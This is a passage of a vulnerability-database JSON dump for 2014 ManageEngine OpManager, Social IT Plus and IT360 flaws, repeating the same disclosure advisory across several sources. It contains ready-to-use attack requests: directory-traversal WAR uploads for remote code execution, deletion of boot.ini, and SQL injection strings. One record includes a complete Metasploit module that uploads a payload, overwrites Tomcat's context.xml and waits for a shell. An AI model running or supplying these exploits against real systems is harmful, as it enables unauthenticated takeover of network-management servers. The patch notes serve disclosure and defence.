11.0)\n\nb)\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\n\n\n>> Fix:\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\n\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\nResolves #1 and #2\n\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\nResolves #3\n\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\nResolves #4\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n>> Enabling secure digital business >>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-03-14T14:37:35", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2018-01-26T00:00:00", "type": "zdt", "title": "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-7866", "CVE-2014-7868", "CVE-2014-6036"], "modified": "2018-01-26T00:00:00", "id": "1337DAY-ID-29642", "href": "https://0day.today/exploit/description/29642", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\r\n \r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n \r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n \r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n \r\n \r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\n<... WAR file payload ...>\r\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n \r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\n<... WAR file payload ...>\r\n \r\nAffected versions: OpManager v? to v11.4\r\n \r\n \r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\r\n \r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n \r\n \r\n#3\r\nVulnerability: Remote code execution via file upload\r\nCVE-2014-7866\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n \r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n \r\n \r\n#4\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7868\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\n \r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\r\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\r\n \r\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nResolves #1 and #2\r\n \r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n \r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n \r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>\n\n# 0day.today [2018-03-14] #", "sourceHref": "https://0day.today/exploit/29642", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-02T19:34:58", "description": "Exploit for java platform in category remote exploits", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "zdt", "title": "ManageEngine OpManager / Social IT Arbitrary File Upload Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6034"], "modified": "2014-10-01T00:00:00", "id": "1337DAY-ID-22712", "href": "https://0day.today/exploit/description/22712", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\n\r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n\r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n\r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\nAffected versions: OpManager v? to v11.3\r\n\r\n\r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360 v? to v10.4\r\n\r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n\r\n\r\n##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\nRank = ExcellentRanking\r\n\r\ninclude Msf::Exploit::Remote::HttpClient\r\ninclude Msf::Exploit::FileDropper\r\n\r\ndef initialize(info = {})\r\nsuper(update_info(info,\r\n'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload',\r\n'Description' => %q{\r\nThis module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.\r\nThe vulnerability exists in the FileCollector servlet which accepts unauthenticated\r\nfile uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on\r\nversion 11.0 of SocialIT for Windows and Linux.\r\n},\r\n'Author' =>\r\n[\r\n'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\r\n],\r\n'License' => MSF_LICENSE,\r\n'References' =>\r\n[\r\n[ 'CVE', '2014-6034' ],\r\n[ 'OSVDB', '112276' ],\r\n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt'\r\n],\r\n[ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]\r\n],\r\n'Privileged' => true,\r\n'Platform' => 'java',\r\n'Arch' => ARCH_JAVA,\r\n'Targets' =>\r\n[\r\n[ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ]\r\n],\r\n'DefaultTarget' => 0,\r\n'DisclosureDate' => 'Sep 27 2014'))\r\n\r\nregister_options(\r\n[\r\nOpt::RPORT(80),\r\nOptInt.new('SLEEP',\r\n[true, 'Seconds to sleep while we wait for WAR deployment', 15]),\r\n], self.class)\r\nend\r\n\r\ndef check\r\nres = send_request_cgi({\r\n'uri' =>\r\nnormalize_uri(\"/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector\"),\r\n'method' => 'GET'\r\n})\r\n\r\n# A GET request on this servlet returns \"405 Method not allowed\"\r\nif res and res.code == 405\r\nreturn Exploit::CheckCode::Detected\r\nend\r\n\r\nreturn Exploit::CheckCode::Safe\r\nend\r\n\r\n\r\ndef upload_war_and_exec(try_again, app_base)\r\ntomcat_path = '../../../tomcat/'\r\nservlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector'\r\n\r\nif try_again\r\n# We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration\r\n# does not allow us to deploy WARs. Fix that by uploading a new context.xml file.\r\n# The file we are uploading has the same content apart from privileged=\"false\" and lots of XML\r\ncomments.\r\n# After replacing the context.xml file let's upload the WAR again.\r\nprint_status(\"#{peer} - Replacing Tomcat context file\")\r\nsend_request_cgi({\r\n'uri' => normalize_uri(servlet_path),\r\n'method' => 'POST',\r\n'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context\r\nprivileged=\"true\"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>},\r\n'ctype' => 'application/xml',\r\n'vars_get' => {\r\n'regionID' => tomcat_path + \"conf\",\r\n'FILENAME' => \"context.xml\"\r\n}\r\n})\r\nelse\r\n# We need to create the upload directories before our first attempt to upload the WAR.\r\nprint_status(\"#{peer} - Creating upload directories\")\r\nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4))\r\nsend_request_cgi({\r\n'uri' => normalize_uri(servlet_path),\r\n'method' => 'POST',\r\n'data' => rand_text_alphanumeric(4 + rand(32 - 4)),\r\n'ctype' => 'application/xml',\r\n'vars_get' => {\r\n'regionID' => \"\",\r\n'FILENAME' => bogus_file\r\n}\r\n})\r\nregister_files_for_cleanup(\"state/archivedata/zip/\" + bogus_file)\r\nend\r\n\r\nwar_payload = payload.encoded_war({ :app_name => app_base }).to_s\r\n\r\nprint_status(\"#{peer} - Uploading WAR file...\")\r\nres = send_request_cgi({\r\n'uri' => normalize_uri(servlet_path),\r\n'method' => 'POST',\r\n'data' => war_payload,\r\n'ctype' => 'application/octet-stream',\r\n'vars_get' => {\r\n'regionID' => tomcat_path + \"webapps\",\r\n'FILENAME' => app_base + \".war\"\r\n}\r\n})\r\n\r\n# The server either returns a 500 error or a 200 OK when the upload is successful.\r\nif res and (res.code == 500 or res.code == 200)\r\nprint_status(\"#{peer} - Upload appears to have been successful, waiting \" + datastore['SLEEP'].to_s +\r\n\" seconds for deployment\")\r\nsleep(datastore['SLEEP'])\r\nelse\r\nfail_with(Exploit::Failure::Unknown, \"#{peer} - WAR upload failed\")\r\nend\r\n\r\nprint_status(\"#{peer} - Executing payload, wait for session...\")\r\nsend_request_cgi({\r\n'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),\r\n'method' => 'GET'\r\n})\r\nend\r\n\r\n\r\ndef exploit\r\napp_base = rand_text_alphanumeric(4 + rand(32 - 4))\r\n\r\nupload_war_and_exec(false, app_base)\r\nregister_files_for_cleanup(\"tomcat/webapps/\" + \"#{app_base}.war\")\r\n\r\nsleep_counter = 0\r\nwhile not session_created?\r\nif sleep_counter == datastore['SLEEP']\r\nprint_error(\"#{peer} - Failed to get a shell, let's try one more time\")\r\nupload_war_and_exec(true, app_base)\r\nreturn\r\nend\r\n\r\nsleep(1)\r\nsleep_counter += 1\r\nend\r\nend\r\nend\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3, then install the patch in https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4).\r\nManageEngine have indicated that the soon to be released OpManager version 11.4 might not have the fix as the release is almost ready. They are planning to include the fix in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/22712", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2022-08-14T18:12:01", "description": "", "cvss3": {}, "published": "2014-11-09T00:00:00", "type": "exploitdb", "title": "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2014-6034", "2014-6035", "2014-6036", "2014-7866", "2014-7868", "CVE-2014-6034", "CVE-2014-6035", "CVE-2014-6036", "CVE-2014-7866", "CVE-2014-7868"], "modified": "2014-11-09T00:00:00", "id": "EDB-ID:43896", "href": "https://www.exploit-db.com/exploits/43896", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\r\n\r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n\r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n\r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\n<... WAR file payload ...>\r\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\n<... WAR file payload ...>\r\n\r\nAffected versions: OpManager v? to v11.4\r\n\r\n\r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\r\n\r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n\r\n\r\n#3\r\nVulnerability: Remote code execution via file upload\r\nCVE-2014-7866\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n\r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n\r\n\r\n#4\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7868\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\r\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\r\n\r\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nResolves #1 and #2\r\n\r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n\r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "sourceHref": "https://www.exploit-db.com/download/43896", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:55:41", "description": "A directory traversal vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to lack of authentication and insufficient input validation on parameters sent to \"/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector\" in HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations.", "cvss3": {}, "published": "2014-10-12T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine Multiple Products FileCollector doPost Directory Traversal (CVE-2014-6034)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6034"], "modified": "2015-11-03T00:00:00", "id": "CPAI-2014-1895", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T12:00:11", "description": "A directory traversal vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to lack of authentication and insufficient input validation on parameters sent to \"/servlets/multipartRequest\" in HTTP requests. A remote unauthenticated attacker can delete arbitrary files in arbitrary locations on the server and execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.", "cvss3": {}, "published": "2014-10-20T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine Multiple Products multipartRequest Directory Traversal (CVE-2014-6036)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6036"], "modified": "2014-10-21T00:00:00", "id": "CPAI-2014-1916", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-12-17T12:00:03", "description": "A directory traversal vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to lack of authentication and insufficient input validation in HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations.", "cvss3": {}, "published": "2014-10-13T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine Multiple Products FileCollector Directory Traversal (CVE-2014-6035)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2014-10-28T00:00:00", "id": "CPAI-2014-1905", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2022-01-31T21:14:33", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the FileCollector servlet. The issue lies in the failure to sanitize the filenames uploaded to the servlet. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager FileCollector FILENAME File Upload Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6034"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-143", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-143/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-31T21:14:59", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the MultipartRequestServlet servlet. The issue lies in the failure to sanitize the filenames uploaded to the servlet. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "cvss3": {}, "published": "2015-04-03T00:00:00", "type": "zdi", "title": "ManageEngine OpManager MultipartRequestServlet filename File Upload Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6036"], "modified": "2015-04-03T00:00:00", "id": "ZDI-15-113", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-113/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-01-31T21:14:34", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the AgentDataHandler class. The issue lies in the failure to sanitize the filenames uploaded to the servlet. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager AgentDataHandler FILENAME File Upload Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-142", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-142/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in ManageEngine OpManager FileCollector servlet regionID parameter\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2014-11-30T00:00:00", "type": "dsquare", "title": "ManageEngine OpManager FileCollector Servlet File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6034"], "modified": "2014-11-30T00:00:00", "id": "E-410", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in ManageEngine OpManager FileCollector servlet FILENAME parameter\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2014-11-30T00:00:00", "type": "dsquare", "title": "ManageEngine OpManager FileCollector Servlet File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 